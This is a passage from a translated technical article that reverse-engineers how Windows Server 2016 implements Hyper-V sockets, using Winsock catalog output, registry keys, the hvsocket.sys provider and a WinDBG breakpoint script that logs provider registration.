<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="123" src="https://lh4.googleusercontent.com/4HDhJ_UHxgWLejHf0tkPJr7lRBQeq5ujYjThts1JR2zhDMjXl09QsALcdsWY46STXPeHVb5dy5-xdfeoj_WZzSWn_wewKq6fdSbeoKFECl-23XpVu5iUuMB2UXnO5lqce0r_mouxgLhNgwUHhg" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="163" /></span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="123" src="https://lh6.googleusercontent.com/pwtvO61I1o-iCArmpEgHyEgtXinqW5UHUXjFl1y9icPu8591lWgFsqkyS2dl9UhSM-uXuYu6gwISat64wUdON-ZmvePmMMLU0PawgO9kSMAMcGSBiP879IzZxJon5yuxJjr855sQlhB-eXenkg" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="164" /></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="144" src="https://lh3.googleusercontent.com/4MKgERqnGGkx1FDgezp92P5UBbBGG1T_kMmF60q5hoa60NW2gzFTgjQ9rRdaMtqeaNzDEVijOgFJo7t95TnJrv7KOn6eOG1WWE_Esc0KRBvWO-sCpakGkC7bwkmMFdVYH48fvFxRcCg4imIJfw" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="193" /></span></div>
<div dir="ltr" style="line-height: 1.26; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 28.35pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Really, certain steps were taken in this direction and at developers got:</span></div>
<ul style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; margin-left: 53.45pt; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.26; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">header files hvgdk.h, vid.h, VidDefs.h (Windows WDK 6.0, 7.1, Singularity OS);</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; margin-left: 53.45pt; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.26; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Hyper-V Top Level Functional Specification;</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; margin-left: 53.45pt; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.26; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">documentation on msdn which generally coincided with TLFS, but contained more detailed information;</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; margin-left: 53.45pt; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.26; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">on osronline.com the architect of Hyper-V Jake Oshins answered questions of developers of the drivers concerning the Hyper-V environment.</span></div>
</li>
</ul>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">But nevertheless, the published information was obvious insufficiently in order that someone began to develop new products basing of Hyper-V (only livecloudkd from moonsols is remembered and, seemingly, the most part of information developers got from reverse engineering). Perhaps, in this regard, the policy of Microsoft sharply changed:</span></div>
<ul style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; margin-left: 18pt; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.26; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Header files were removed from WDK (part still exists in singularity OS);</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; margin-left: 18pt; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.26; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">documentation from MSDN disappeared (on osronline.com for formality conducted </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline;">https://www.osronline.com/showthread.cfm</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> survey</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline;">? link=254171</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">, is necessary documentation or not);</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; margin-left: 18pt; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.26; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Hyper-V extentions for WinDBG (network virtualization kernel debugger extension nvkd.dll), hvexts.dll, which mentioned by WinDBG at connection to hvix64.exe (hvax64.exe), was not laid out in the general access;</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; margin-left: 18pt; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.26; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Jake Oshins (the Hyper-V Architect) disappeared from the osronline.com forum.</span></div>
</li>
</ul>
<br /><div dir="ltr" style="line-height: 1.26; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Nevertheless, Microsoft independently began to develop Linux Integration Services - set of modules and drivers allowing to start Linux in Hyper-V. Its source codes are integrated into Linux kernel (2.6.32 and above), and, respectively, are uploaded publicly. </span></div>
<div dir="ltr" style="line-height: 1.26; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">TLFS remains the only source of hypervisor internals information, however the specification issued in February, 2017 for Windows Server 2016 contains already 238 pages, but not 420 as it was in the previous specification for Windows Server 2012 R2 (from 23 sections remained 16, descriptions of many hyper calls disappeared, however two sections describing VSM work - Virtual Secure Mode, and the enclosed virtualization which support appeared in Windows Server 2016, were added)</span></div>
<div dir="ltr" style="line-height: 1.26; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">But in 2016 in the ws2def.h file (core definitions for the Winsock2 specification) in the Windows SDK 10.0.10586 the line appeared </span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: grey; font-family: Calibri; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">#define</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: #6f008a; font-family: Calibri; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">AF_HYPERV</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> 34</span></div>
<div dir="ltr" style="line-height: 1.26; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">and the HvSocket.h header was added to the Windows SDK 10.0.14393. In what purposes it was made?</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">New function - Powershell Direct which allows to carry out Powershell commands in a guest operating system without network connection was added to Windows Server 2016, transmitting all necessary data through the VMBus. This mechanism works, using so-called Hyper-V sockets, which were integrated into a network stack of Windows. This article became result of attempt to understand, how the mechanism of network interaction in Windows works and how constructs built-in support of Hyper-V sockets and that is carried out by an operating system during the work of the new protocol.</span></div>
<div dir="ltr" style="line-height: 1.26; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">At first, we will consider in what way the virtualization subsystem was integrated with a network stack of Windows, then we will investigate operation of application, which working with Hyper-V sockets, and we learn how PowerShell Direct technology works. Windows 10 also supports Hyper-V sockets, but in the article it is practically not considered - the emphasis is placed on server OS, but, presumably, essential difference in realization should not be.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Before reading of article is recommended to study section 7 "Network" of the book "Windows Internals, the 6th edition". Perhaps, by the time of the publication of article in sale there will already be the 7th edition with that chapter (Part II or III), and also with excellent article "The network program Windows Vista/2008 interface: the internal device, use and breaking", earlier available on wasm.ru. Now it can be found on various websites (for example, </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline;">https://vxlab.info/wasm/article.php-article=npi_subvert.htm</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline;">)</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">. MSDN also quite in detail lights the materials mentioned in article, but without concrete of Hyper-V sockets.</span></div>
<ol start="2" style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; list-style-type: decimal; margin-left: -18pt; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Components of an operating system</span></div>
</li>
</ol>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">At first we will look at the list of the providers (Layered Service Provider - LSP), established in an operating system. We see two records, which name contains Hyper-V.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="189" src="https://lh6.googleusercontent.com/oCHuMnkMfvNc7NXVXca2aHSDAP0Mggofo3pCSnMTF1ItgnwhYQyPQqGUzPspPQnLZnG36LD_b40tcN_T3UcSfcHwpSKChIghuyeTfkkY68syK4lhPdc38Vw9VNByPtaV1VQWrayo_aMsaLBCzw" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="366" /></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="121" src="https://lh3.googleusercontent.com/O1BXxFlaPzp-ePkVmDa6TV5O3qDxpDhciwlOkx7iZdET-QqyeKQ1xV8ATjMzWyrM9kz6F4WuSIM-WLJCuRiU6kqvjHoBOgLKJx9lg-zll3fU-Fqh0epHUvkGBzD8ZBdv0CbqCVAskqEhkGO_EA" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="367" /></span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">PS C:\Windows\system32> netsh winsock show catalog</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Winsock Catalog Provider Entry</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">------------------------------------------------------</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Entry Type: Base Service Provider</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Description: Hyper-V RAW</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Provider ID: {1234191B-4BF7-4CA7-86E0-DFD7C32B5445}</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Provider Path: %SystemRoot%\system32\mswsock.dll</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Catalog Entry ID: 1001</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Version: 2</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Address Family: 34</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Max Address Length: 36</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Min Address Length: 36</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Socket Type: 1</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Protocol: 1</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Service Flags: 0x20026</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Protocol Chain Length: 1</span></div>
<br /><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">If we decipher Service Flags according to the description WSAPROTOCOL_INFO, then we will receive 0x20026 = XP1_GUARANTEED_DELIVERY | XP1_GUARANTEED_ORDER | XP1_GRACEFUL_CLOSE | XP1_IFS_HANDLES</span></div>
<div dir="ltr" style="line-height: 1.26; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">In the registry for each provider one section is created (32-bit and 64-bit):</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000001 и HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">64</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">\000000000001</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="65" src="https://lh3.googleusercontent.com/rfdz8BOqdiW3EmqLGfdrWSxLyKj6gyrieoGIWwLMqm-OF3eQT9r133L_IaFW0nGarRTESWBe6EK4rpEpYCgvZKYo7nAmDZrxAY56qgRkYEyOvl6_XRZR76802U5MVBgZWGYDXqw2kSuzbcnhpg" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="574" /></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">In the section HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Winsock\Parameters vmbus transport was added (irda and RFCOMM in Windows Server 2016 in default installation are absent and is only in Windows 10):</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="52" src="https://lh6.googleusercontent.com/pbhGWmXcFOPJ_3HULrWNTgi_ZMK2dz5Is2wQHqprZNBqjTMwLCc2W3VXsVZ5J-n-DgAj0FjLat9p7R1QgTMz1YorBMpeqhrCaQFtBspmb27gCEMrQ0aTknzuTVjc3mamDj_Sm6eN4CiTO_I_Eg" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="580" /></span></div>
<div dir="ltr" style="line-height: 1.26; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\vmbus\Parameters</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> key contains the subsection Winsock, containing the HelperDllName parameter, in which the name of the wshhyperv.dll library loaded by the main provider mswsock.dll at a stage of the socket creation.</span></div>
<br /><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="77" src="https://lh4.googleusercontent.com/gFyDpKDjNXkFzmaCw3rIU-1GT23dzvd2BR5LgkbX1jMicTzag_o5b0SaPSsSTua5HUm7lhUh-mKnQGKJxPfwtdye-9HHaf65aRdbgRu-lorCEHSLejGdQDWn7mT4MbcVT1tbRdFr4f2H4VH_NA" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="513" /></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="181" src="https://lh3.googleusercontent.com/vcXjBO9CGmJIDCEjqOkSMAQ9fCj8Si5f0TQzeJzUQqxSThWG6LuqPF5pwFLR8bQlE3R3yYnJjWpjzP6p5UZbZwUb15eg7CD7GZ-xXKlivdlx6xH6IjKul3Sj4O_n_NFK6UfTnqIOpNwT4pJQpg" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="545" /></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">In the Windows Internals 6th edition is written: "Note The Raw transport protocol is not really a protocol and does not perform any encapsulation of the user data. This allows the client to directly control the contents of the frames transmitted and received by the network interface." In our case the Hyper-V RAW protocol is used. However, in spite of the fact that the name of protocol contains RAW, when operation of socket create is executed and </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">socket</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> function is called SOCK_STREAM second parameter (socket type - stream socket), though at WinSock2.h contains a separate type of a socket - SOCK_RAW.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">There was a new NPI provider - hvsocket.sys. Is present at import of vmbus.sys, vmbusr.sys and netio.sys drivers and, respectively, it is loaded together with one of the specified modules, which started first (usual netio.sys). Provider is registered by vmbusr.sys driver by a call of the imported function hvsocket!HvSocketProviderStart, which next calls netio! NmrRegisterProvider.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Detail working with providers was described in article "The network program Windows Vista/2008 interface: internal device, use and breaking" </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline;">(https://vxlab.info/wasm/print.php-article=npi_subvert.htm)</span></div>
<div dir="ltr" style="line-height: 1.26; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Using WinDBG it is possible to receive the list of all registered providers and their clients. For providers, it is enough to write a script (we put bp on netio!NmrRegisterProvider and write value of parameters in log file):</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Windbg> bu netio!NmrRegisterProvider</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Windbg>.logopen D:\ida_files\2016\log.txt</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Windbg>bp netio!NmrRegisterProvider ".echo **********bp netio!NmrRegisterProvider********; .echo kc;kc; .echo dps rcx;dps rcx; .echo NpiId GUID; dt _GUID poi(rcx+28h); .echo NPI_MODULEID_TYPE GUID; dt _GUID poi(rcx+30h)+8; g"</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">NTSTATUS NmrRegisterProvider(</span></div>
